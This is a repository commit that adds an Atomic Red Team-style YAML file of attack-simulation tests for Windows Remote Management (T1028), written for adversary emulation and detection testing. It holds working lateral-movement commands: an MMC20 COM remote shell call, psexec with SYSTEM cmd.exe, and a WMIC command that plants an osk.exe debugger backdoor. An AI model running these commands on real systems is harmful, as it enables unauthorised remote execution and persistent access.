security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1028

Browse Source 
1028 inbound hot! 🔥
This commit is contained in:
Michael Haag
2018-05-25 10:00:18 -04:00
parent 24c91deef0
commit ff46dfdcbb
1 changed files with 90 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1028/T1028.yaml
+90
View File
@@ -0,0 +1,90 @@
---
attack_technique: T1028
display_name: Windows Remote Management
atomic_tests:
- name: Enable Windows Remote Management
description: |
Powershell Enable WinRM
supported_platforms:
- windows
executor:
name: powershell
command: |
powershell Enable-PSRemoting -Force
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
supported_platforms:
- windows
input_arguments:
computername:
description: Name of Computer
type: string
default: computer1
executor:
name: command_prompt
command: |
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","${computername}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- name: WMIC Process Call Create
description: |
Utilize WMIC to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
wmic /user:${user_name} /password:${password} /node:${computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
- name: Psexec
description: |
Utilize psexec to start remote process
supported_platforms:
- windows
input_arguments:
user_name:
description: Username
type: String
default: DOMAIN\Administrator
password:
description: Password
type: String
default: P@ssw0rd1
computer_name:
description: Target Computer Name
type: String
default: Target
executor:
name: command_prompt
command: |
psexec \\host -u domain\user -p password -s cmd.exe